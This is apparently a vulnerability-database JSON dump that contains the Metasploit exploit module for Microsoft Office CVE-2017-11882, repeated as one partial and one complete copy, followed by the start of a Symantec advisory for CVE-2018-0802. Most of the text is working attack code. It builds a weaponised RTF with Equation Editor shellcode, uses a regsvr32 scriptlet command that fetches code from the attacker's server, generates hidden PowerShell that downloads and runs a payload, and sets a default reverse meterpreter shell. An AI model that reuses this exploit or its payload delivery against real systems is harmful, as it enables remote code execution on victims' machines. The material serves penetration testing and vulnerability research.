[eax],al\n shellcode << \"\\x02\\x00\" # 4: 02 00 add al,BYTE PTR [eax]\n shellcode << \"\\x9e\" # 6: 9e sahf\n shellcode << \"\\xc4\\xa9\\x00\\x00\\x00\\x00\" # 7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0]\n shellcode << \"\\x00\\x00\" # d: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\xc8\" # f: 00 c8 add al,cl\n shellcode << \"\\xa7\" # 11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi]\n shellcode << \"\\\\\" # 12: 5c pop esp\n shellcode << \"\\x00\\xc4\" # 13: 00 c4 add ah,al\n shellcode << \"\\xee\" # 15: ee out dx,al\n shellcode << \"[\" # 16: 5b pop ebx\n shellcode << \"\\x00\\x00\" # 17: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\x00\" # 19: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\x03\" # 1b: 00 03 add BYTE PTR [ebx],al\n shellcode << \"\\x01\\x01\" # 1d: 01 01 add DWORD PTR [ecx],eax\n shellcode << \"\\x03\\n\" # 1f: 03 0a add ecx,DWORD PTR [edx]\n shellcode << \"\\n\\x01\" # 21: 0a 01 or al,BYTE PTR [ecx]\n shellcode << \"\\x08ZZ\" # 23: 08 5a 5a or BYTE PTR [edx+0x5a],bl\n shellcode << \"\\xB8\\x44\\xEB\\x71\\x12\" # 26: b8 44 eb 71 12 mov eax,0x1271eb44\n shellcode << \"\\xBA\\x78\\x56\\x34\\x12\" # 2b: ba 78 56 34 12 mov edx,0x12345678\n shellcode << \"\\x31\\xD0\" # 30: 31 d0 xor eax,edx\n shellcode << \"\\x8B\\x08\" # 32: 8b 08 mov ecx,DWORD PTR [eax]\n shellcode << \"\\x8B\\x09\" # 34: 8b 09 mov ecx,DWORD PTR [ecx]\n shellcode << \"\\x8B\\x09\" # 36: 8b 09 mov ecx,DWORD PTR [ecx]\n shellcode << \"\\x66\\x83\\xC1\\x3C\" # 38: 66 83 c1 3c add cx,0x3c\n shellcode << \"\\x31\\xDB\" # 3c: 31 db xor ebx,ebx\n shellcode << \"\\x53\" # 3e: 53 push ebx\n shellcode << \"\\x51\" # 3f: 51 push ecx\n shellcode << \"\\xBE\\x64\\x3E\\x72\\x12\" # 40: be 64 3e 72 12 mov esi,0x12723e64\n shellcode << \"\\x31\\xD6\" # 45: 31 d6 xor esi,edx\n shellcode << \"\\xFF\\x16\" # 47: ff 16 call DWORD PTR [esi]\n shellcode << \"\\x53\" # 49: 53 push ebx\n shellcode << \"\\x66\\x83\\xEE\\x4C\" # 4a: 66 83 ee 4c sub si,0x4c\n shellcode << \"\\xFF\\x10\" # 4e: ff 10 call DWORD PTR [eax]\n shellcode << \"\\x90\" # 50: 90 nop\n shellcode << \"\\x90\" # 50: 90 nop\n\n footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n footer << '4500710075006100740069006F006E0020004E006100740069007600650000000'\n footer << '00000000000000000000000000000000000000000000000000000'\n footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000400'\n footer << '0000C5000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00'\n footer << '000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\n footer << '000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000FFFFFF'\n footer << 'FFFFFFFFFFFFFFFFFF000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000001050000050000000D0000004D45544146494C'\n footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C'\n footer << '500000002001C0000000000050000000902000000000500000002'\n footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF'\n footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090'\n footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016'\n footer << '0A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A00000031313131313131'\n footer << '3131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB02100007000000'\n footer << '0000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F00100'\n footer << '00030000000000' + \"\\n\"\n footer << '}{\\result{\\pict{\\*\\picprop}\\wmetafile8\\picw380\\pich260\\picwgoal380\\pichgoal260' + \"\\n\"\n footer << \"0100090000039e00000002001c0000000000050000000902000000000500000002010100000005\\n\"\n footer << \"0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002\\n\"\n footer << \"1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000\\n\"\n footer << \"0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000\\n\"\n footer << \"0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000\\n\"\n footer << \"002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100\\n\"\n footer << \"000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a\\n\"\n footer << \"0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300\\n\"\n footer << \"00000000\\n\"\n footer << \"}}}\\n\"\n footer << '\\par}' + \"\\n\"\n\n\n payload = shellcode\n payload += [0x00402114].pack(\"V\")\n payload += \"\\x00\" * 2\n payload += \"regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll\"\n payload = (payload + (\"\\x00\" * (197 - payload.length))).unpack('H*').first\n payload = header + object_class + payload + footer\n payload\n end\n\n\n\n def gen_psh(url, *method)\n ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl\n\n if method.include? 'string'\n download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))\n else\n # Random filename to use, if there isn't anything set\n random = \"#{rand_text_alphanumeric 8}.exe\"\n # Set filename (Use random filename if empty)\n filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']\n\n # Set path (Use %TEMP% if empty)\n path = datastore['BinaryEXE-PATH'].blank? ? \"$env:temp\" : %Q('#{datastore['BinaryEXE-PATH']}')\n\n # Join Path and Filename\n file = %Q(echo (#{path}+'\\\\#{filename}'))\n\n # Generate download PowerShell command\n download_string = Rex::Powershell::PshMethods.download_run(url, file)\n end\n\n download_and_run = \"#{ignore_cert}#{download_string}\"\n\n # Generate main PowerShell command\n return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)\n end\n\n def on_request_uri(cli, _request)\n if _request.raw_uri =~ /\\.sct$/\n print_status(\"Handling request for .sct from #{cli.peerhost}\")\n payload = gen_psh(\"#{get_uri}\", \"string\")\n data = gen_sct_file(payload)\n send_response(cli, data, 'Content-Type' => 'text/plain')\n else\n print_status(\"Delivering payload to #{cli.peerhost}...\")\n p = regenerate_payload(cli)\n data = cmd_psh_payload(p.encoded,\n payload_instance.arch.first,\n remove_comspec: true,\n exec_in_place: true\n )\n send_response(cli, data, 'Content-Type' => 'application/octet-stream')\n end\n end\n\n\n def rand_class_id\n \"#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}\"\n end\n\n\n def gen_sct_file(command)\n # If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error).\n if command == ''\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"></registration></scriptlet>}\n # If a command is provided, tell the target system to execute it.\n else\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"><script><![CDATA[ var r = new ActiveXObject(\"WScript.Shell\").Run(\"#{command}\",0);]]></script></registration></scriptlet>}\n end\n end\n\n\n def primer\n file_create(generate_rtf)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/office_ms17_11882.rb"}, {"lastseen": "2021-02-22T20:34:12", "description": "Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory.\n", "published": "2017-11-21T19:47:02", "type": "metasploit", "title": "Microsoft Office CVE-2017-11882", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11882"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::Powershell\n include Msf::Exploit::EXE\n include Msf::Exploit::FILEFORMAT\n\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft Office CVE-2017-11882',\n 'Description' => %q{\n Module exploits a flaw in how the Equation Editor that\n allows an attacker to execute arbitrary code in RTF files without\n interaction. The vulnerability is caused by the Equation Editor,\n to which fails to properly handle OLE objects in memory.\n },\n 'Author' => ['mumbai', 'embedi'],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2017-11-15',\n 'References' => [\n ['CVE', '2017-11882'],\n ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'],\n ['URL', 'https://github.com/embedi/CVE-2017-11882']\n ],\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n ['Microsoft Office', {} ],\n ],\n 'DefaultTarget' => 0,\n 'Payload' => {\n 'DisableNops' => true\n },\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/meterpreter/reverse_tcp'\n }\n ))\n\n register_options([\n OptString.new(\"FILENAME\", [true, \"Filename to save as, or inject\", \"msf.rtf\"]),\n OptString.new(\"FOLDER_PATH\", [false, \"Path to file to inject\", nil])\n ])\n end\n\n def retrieve_header(filename)\n if (not datastore['FOLDER_PATH'].nil?)\n path = \"#{datastore['FOLDER_PATH']}/#{datastore['FILENAME']}\"\n else\n path = nil\n end\n if (not path.nil?)\n if ::File.file?(path)\n File.open(path, 'rb') do |fd|\n header = fd.read(fd.stat.size).split('{\\*\\datastore').first\n header = header.to_s # otherwise I get nil class...\n print_status(\"Injecting #{path}...\")\n return header\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\n end\n return header\n end\n\n\n\n def generate_rtf\n header = retrieve_header(datastore['FILENAME'])\n object_class = '{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}\\objw380\\objh260{\\*\\objdata '\n object_class << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'\n object_class << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'\n object_class << '09000600000000000000000000000100000001000000000000000010000002000'\n object_class << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040'\n object_class << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0'\n object_class << '07400720079000000000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000000000000000016000500ffffffffffffffff02000'\n object_class << '00002ce020000000000c0000000000000460000000000000000000000008020ce'\n object_class << 'a5613cd30103000000000200000000000001004f006c006500000000000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '000000000000001400000000000000010043006f006d0070004f0062006a00000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '0000000000000000000000000000120002010100000003000000ffffffff00000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '0001000000660000000000000003004f0062006a0049006e0066006f000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000012000201ffffffff04000000ffffffff000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000003'\n object_class << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060'\n object_class << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'ffffff01000002080000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'\n object_class << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'\n object_class << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << \"00000300040000000000000000000000000000000000000000000000000000000\"\n object_class << \"000000000000000000000000000000000000000000000000000000000000000\\n\"\n\n\n shellcode = \"\\x1c\\x00\" # 0: 1c 00 sbb al,0x0\n shellcode << \"\\x00\\x00\" # 2: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x02\\x00\" # 4: 02 00 add al,BYTE PTR [eax]\n shellcode << \"\\x9e\" # 6: 9e sahf\n shellcode << \"\\xc4\\xa9\\x00\\x00\\x00\\x00\" # 7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0]\n shellcode << \"\\x00\\x00\" # d: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\xc8\" # f: 00 c8 add al,cl\n shellcode << \"\\xa7\" # 11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi]\n shellcode << \"\\\\\" # 12: 5c pop esp\n shellcode << \"\\x00\\xc4\" # 13: 00 c4 add ah,al\n shellcode << \"\\xee\" # 15: ee out dx,al\n shellcode << \"[\" # 16: 5b pop ebx\n shellcode << \"\\x00\\x00\" # 17: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\x00\" # 19: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\x03\" # 1b: 00 03 add BYTE PTR [ebx],al\n shellcode << \"\\x01\\x01\" # 1d: 01 01 add DWORD PTR [ecx],eax\n shellcode << \"\\x03\\n\" # 1f: 03 0a add ecx,DWORD PTR [edx]\n shellcode << \"\\n\\x01\" # 21: 0a 01 or al,BYTE PTR [ecx]\n shellcode << \"\\x08ZZ\" # 23: 08 5a 5a or BYTE PTR [edx+0x5a],bl\n shellcode << \"\\xB8\\x44\\xEB\\x71\\x12\" # 26: b8 44 eb 71 12 mov eax,0x1271eb44\n shellcode << \"\\xBA\\x78\\x56\\x34\\x12\" # 2b: ba 78 56 34 12 mov edx,0x12345678\n shellcode << \"\\x31\\xD0\" # 30: 31 d0 xor eax,edx\n shellcode << \"\\x8B\\x08\" # 32: 8b 08 mov ecx,DWORD PTR [eax]\n shellcode << \"\\x8B\\x09\" # 34: 8b 09 mov ecx,DWORD PTR [ecx]\n shellcode << \"\\x8B\\x09\" # 36: 8b 09 mov ecx,DWORD PTR [ecx]\n shellcode << \"\\x66\\x83\\xC1\\x3C\" # 38: 66 83 c1 3c add cx,0x3c\n shellcode << \"\\x31\\xDB\" # 3c: 31 db xor ebx,ebx\n shellcode << \"\\x53\" # 3e: 53 push ebx\n shellcode << \"\\x51\" # 3f: 51 push ecx\n shellcode << \"\\xBE\\x64\\x3E\\x72\\x12\" # 40: be 64 3e 72 12 mov esi,0x12723e64\n shellcode << \"\\x31\\xD6\" # 45: 31 d6 xor esi,edx\n shellcode << \"\\xFF\\x16\" # 47: ff 16 call DWORD PTR [esi]\n shellcode << \"\\x53\" # 49: 53 push ebx\n shellcode << \"\\x66\\x83\\xEE\\x4C\" # 4a: 66 83 ee 4c sub si,0x4c\n shellcode << \"\\xFF\\x10\" # 4e: ff 10 call DWORD PTR [eax]\n shellcode << \"\\x90\" # 50: 90 nop\n shellcode << \"\\x90\" # 50: 90 nop\n\n footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n footer << '4500710075006100740069006F006E0020004E006100740069007600650000000'\n footer << '00000000000000000000000000000000000000000000000000000'\n footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000400'\n footer << '0000C5000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00'\n footer << '000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\n footer << '000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000FFFFFF'\n footer << 'FFFFFFFFFFFFFFFFFF000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000001050000050000000D0000004D45544146494C'\n footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C'\n footer << '500000002001C0000000000050000000902000000000500000002'\n footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF'\n footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090'\n footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016'\n footer << '0A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A00000031313131313131'\n footer << '3131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB02100007000000'\n footer << '0000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F00100'\n footer << '00030000000000' + \"\\n\"\n footer << '}{\\result{\\pict{\\*\\picprop}\\wmetafile8\\picw380\\pich260\\picwgoal380\\pichgoal260' + \"\\n\"\n footer << \"0100090000039e00000002001c0000000000050000000902000000000500000002010100000005\\n\"\n footer << \"0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002\\n\"\n footer << \"1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000\\n\"\n footer << \"0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000\\n\"\n footer << \"0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000\\n\"\n footer << \"002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100\\n\"\n footer << \"000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a\\n\"\n footer << \"0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300\\n\"\n footer << \"00000000\\n\"\n footer << \"}}}\\n\"\n footer << '\\par}' + \"\\n\"\n\n\n payload = shellcode\n payload += [0x00402114].pack(\"V\")\n payload += \"\\x00\" * 2\n payload += \"regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll\"\n payload = (payload + (\"\\x00\" * (197 - payload.length))).unpack('H*').first\n payload = header + object_class + payload + footer\n payload\n end\n\n\n\n def gen_psh(url, *method)\n ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl\n\n if method.include? 'string'\n download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))\n else\n # Random filename to use, if there isn't anything set\n random = \"#{rand_text_alphanumeric 8}.exe\"\n # Set filename (Use random filename if empty)\n filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']\n\n # Set path (Use %TEMP% if empty)\n path = datastore['BinaryEXE-PATH'].blank? ? \"$env:temp\" : %Q('#{datastore['BinaryEXE-PATH']}')\n\n # Join Path and Filename\n file = %Q(echo (#{path}+'\\\\#{filename}'))\n\n # Generate download PowerShell command\n download_string = Rex::Powershell::PshMethods.download_run(url, file)\n end\n\n download_and_run = \"#{ignore_cert}#{download_string}\"\n\n # Generate main PowerShell command\n return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)\n end\n\n def on_request_uri(cli, _request)\n if _request.raw_uri =~ /\\.sct$/\n print_status(\"Handling request for .sct from #{cli.peerhost}\")\n payload = gen_psh(\"#{get_uri}\", \"string\")\n data = gen_sct_file(payload)\n send_response(cli, data, 'Content-Type' => 'text/plain')\n else\n print_status(\"Delivering payload to #{cli.peerhost}...\")\n p = regenerate_payload(cli)\n data = cmd_psh_payload(p.encoded,\n payload_instance.arch.first,\n remove_comspec: true,\n exec_in_place: true\n )\n send_response(cli, data, 'Content-Type' => 'application/octet-stream')\n end\n end\n\n\n def rand_class_id\n \"#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}\"\n end\n\n\n def gen_sct_file(command)\n # If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error).\n if command == ''\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"></registration></scriptlet>}\n # If a command is provided, tell the target system to execute it.\n else\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"><script><![CDATA[ var r = new ActiveXObject(\"WScript.Shell\").Run(\"#{command}\",0);]]></script></registration></scriptlet>}\n end\n end\n\n\n def primer\n file_create(generate_rtf)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/office_ms17_11882.rb"}], "symantec": [{"lastseen": "2018-03-14T22:40:38", "bulletinFamily": "software", "cvelist": ["CVE-2018-0802"], "description": "### Description\n\nMicrosoft Office is prone to a memory-corruption vulnerability. An attacker can leverage this issue to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts will likely result in denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Office 2007 SP3 \n * Microsoft Office 2010 Service Pack 2 (32-bit editions) \n * Microsoft Office 2010 Service Pack 2 (64-bit editions) \n * Microsoft Office 2013 Service Pack 1 (32-bit editions) \n * Microsoft Office 2013 Service Pack 1 (64-bit editions) \n * Microsoft Office 2016 (32-bit edition) \n * Microsoft Office 2016 (64-bit edition) \n * Microsoft Office 2016 Click-to-Run (C2R) for 32-bit edition \n * Microsoft Office 2016 Click-to-Run (C2R) for 64-bit edition \n * Microsoft Office Compatibility Pack Service Pack 3 \n * Microsoft Word 2007 SP3 \n * Microsoft Word 2010 Service Pack 2 (32-bit editions) \n * Microsoft Word 2010 Service Pack 2 (64-bit editions) \n * Microsoft Word 2013 RT Service Pack 1 \n * Microsoft Word 2013 Service Pack 1 (32-bit editions) \n * Microsoft Word 2013 Service Pack 1 (64-bit editions) \n * Microsoft Word 2016 (32-bit edition) \n * Microsoft Word 2016 (64-bit edition) \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2018-01-09T00:00:00", "published": "2018-01-09T00:00:00", "id": "SMNTC-102347", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102347", "type": "symantec", "title": "Microsoft Office CVE-2018-0802 Memory Corruption Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-14T17:01:30", 